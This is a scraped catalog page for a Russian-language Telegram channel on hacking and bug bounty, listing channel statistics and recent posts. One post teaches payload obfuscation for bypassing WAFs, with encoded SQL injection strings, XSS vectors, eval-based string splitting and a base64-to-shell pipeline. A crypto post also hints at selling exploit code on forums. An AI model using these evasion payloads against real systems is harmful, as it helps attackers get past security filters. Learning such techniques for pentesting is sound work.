tgindex
КАК Я СТАЛ ХАКЕРОМ

КАК Я СТАЛ ХАКЕРОМ

Статистика
@howibecameahackerрусский

Образовательный канал на тему кибербезопасности Связь - @linuxson Разместить рекламу - https://telega.in/c/howibecameahacker

Последний пост
13 дек.
Последнее чтение
14 авг.
Постов за неделю
0
Всего постов
20
Тип
открытый
Язык
русский
В каталоге с
13 авг.
Подписчики
6 215
−9 за 3 дн.
Сутки
−1
−0,02%
Неделя
 
Месяц
 
Просмотров на пост
9 972
20 постов
Вовлечённость
160,5%
к подписчикам
Постов в день
0,0
всего 20
Упоминаний
0
каналов
Охват размещения
оценка
1/24сутки в ленте
1/48двое суток
1/72трое суток

Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.

Посты

  • 13 дек.11,3 тыс114164

    🪙Крипто хакинг (про web3) Я долго собирал информацию на эту тему, что бы рассказать вам, как знания хакинга можно комбинировать с web3. Web3 - блокчейн. Блокчейн - крипта. Крипта = деньги. Для рядового хакера, понимание того, как работают EVM сети, отправка транзакций через RPC и знание DEX приложений, открывают столько же дверей, как и web2. Но на форумах за такой код заказчики платят на порядок больше, так как работаете вы непосредственно с рынком денег. Более того, если вы хорошо разбираетесь в Solidity, вы можете проводить аудит смарт-контрактов (как BugBounty), писать свои смарт контракты, работать в команде криптанов или находить и эксплуатировать уязвимости, работая на себя. Порог входа? Для начала обязательно понимание основ блокчейна и знать хотя бы один, а лучше два языка - Python и JavaScript на базовом уровне. Дальше дело практики и изучение библиотек, но самое сложное - найти того, кто всё понятно объяснит. Поэтому советую начать с этой статьи.

  • 10 дек.9 5091915

    Ну что, живы все? 👋 Понимаю, что конкретно пропал. Честно думал вернуться быстрее, но всё затянулось — вы же знаете как это бывает, начал одно, оно тянет за собой другое, потом третье, и вот уже месяц прошёл незаметно. Заодно немного отдохнул, если честно. Реально нужен был перерыв, голова уже не варила нормально. Ну и между делом успел запилить одну штуку, которая давно в планах висела. Пока молчу что это, но получилось прикольно на мой взгляд. Сами скоро увидите. Ладно, хватит интриговать. Просто хотел сказать что я тут, никуда не делся. Постепенно буду возвращаться к активности, есть чем поделиться. Кто остался - респект вам, спасибо что не отписались 😘

  • 14 окт. 2025 г.12,7 тыс11

    без подписи

  • 14 окт. 2025 г.12,7 тыс11

    без подписи

  • 14 окт. 2025 г.12,7 тыс11

    без подписи

  • 14 окт. 2025 г.11,5 тыс11

    без подписи

  • 14 окт. 2025 г.11,4 тыс11

    без подписи

  • 14 окт. 2025 г.11,6 тыс11

    без подписи

  • 14 окт. 2025 г.10,9 тыс11

    без подписи

  • 14 окт. 2025 г.10,9 тыс11

    без подписи

  • 14 окт. 2025 г.10,8 тыс11

    без подписи

  • 14 окт. 2025 г.12,6 тыс1811из kaspersky_career

    🤝Как мы подружились с AI-ревью Если код-ревью утомляет и забирает ресурс на выполнение других задач, а личного ревьюера на полную ставку так и не появилось — самое время что-то менять. 🎯Руководитель группы разработки ЛК Александр Федотов первым в команде подключил AI-ревью и написал об этом в статье на Хабр. Сразу стало понятно, что это штука не для «затестить», а реальный инструмент. Преимуществами нашего нового AI-помощника поделились с вами в карточках⬆️

  • Советую к ознакомлению, годная статья

  • Ни на что не намекаю, но может у кого то есть лишние бусты? 🙈 https://t.me/boost/howibecameahacker

  • Новое видео на канале, давно хотел сделать видосик на эту тему. Только давайте не душните особо 🔫😊🔫 https://www.youtube.com/watch?v=MZ7KDxpI_xo

  • На следующей неделе попробую тестовый формат контента для телеги, короткие видосы с разбором лаб, cve, ctf челленджей

  • без подписи

  • ☺️ Payload Obfuscation: Практические техники Обфускация пейлоадов — критический навык для пентестеров и баг-хантеров. Суть проста: замаскировать вредоносный код так, чтобы он прошёл через WAF, фильтры и валидацию, но сохранил функциональность при выполнении. 🔤URL Encoding Базовый payload: ' OR 1=1-- - Single encoding: %27%20OR%201%3D1%2D%2D%20%2D Double encoding (% → %25): %2527%2520OR%25201%253D1%252D%252D%2520%252D 🔤Unicode/Hex/Octal для XSS Unicode варианты: \u003Csvg onload=alert(1)\u003E \u{3C}svg onload=alert(1)\u{3E} Hex: \x3Csvg onload=alert(1)\x3E Octal: \074svg onload=alert(1)\076 Mixed encoding: \u{3C}svg%20onload\075al\u0065rt(1)\x3E Variable Expression (JavaScript) a="al";b="ert";c="(1";d=")";eval(a+b+c+d); c="ale";Function(c+"rt()")() 🔤Array-based обфускация (PHP) Payload: http://example.com/?id[]=1)/*&id[]=*/OR/*&id[]=*/1=(SELECT/*&id[]=*/SLEEP(4))+--+- Результат после join: 1)/*,*/OR/*,*/1=(SELECT/*,*/SLEEP(4)) -- - 🔤Shell обфускация Базовая команда: id Hex escape: $'\x69\x64' Комплексная: {e'c'ho,a'W''Q'K}|{bas'e'64,-d}|s''h

  • Полезные расширения для для багбаунти 😀FireFox 🔍 Link Gopher 🔍 Adblock Plus 🔍 FoxyProxy Standard 🔍 Video Speed Controller 🔍 Check XSS 🔍 HackTools 🔍 Bulk URL Opener 🔍 Temp Mail 🔍 JS Beautify CSS HTML 🔍 Multi-Account Containers 😀Chrome 🌐 TruffleHog 🌐 Code Formatter 🌐 Freedium Extension 🌐 BuiltWith 🌐 Wappalyzer 🌐 WhatRuns 🌐 Retire.js 🌐 Cookie Extractor 🌐 Wayback Machine 🌐 EXIF Data Viwer 🌐 Shodan 🌐 S3 Bucket List 🌐 Ublock Origin 🌐 Resources Saver 🌐 Dot Git 🌐 EndPointer

  • Хочешь узнать как живёт и двигается один из топов RU Багбаунти? Тогда тебе ко мне! 🔥 Всем привет! Меня зовут rolegiv и последние 11 месяцев часть моей жизни — это поиск уязвимостей. Всё началось со смешного отчёта за который мне до сих пор стыдно... Но мы сейчас не об этом! С тех пор я успел: 😀Ворваться в топ-4 рейтинга Standoff365 😀Ворваться в топ-32 рейтинга BI.ZONE 😀Топ-2 на Standoff Hacks Ahmedabad 😀Топ-5 на приватке от ВК 😀Топ-5 на BUGS ZONE 5.0 Я решил создать канал, чтобы делиться всем, что узнаю на этом пути: разбирать свои и чужие кейсы, рассказывать о плюсах и минусах разных программ и просто говорю о Российском баг баунти, что происходит в индустрии помимо поиска багов. Подписывайся, если тебе интересен реальный опыт, а не скучные технические посты. Будем газовать вместе 🔥🔥🔥🇷🇺 🌂@rolegiv_BugBounty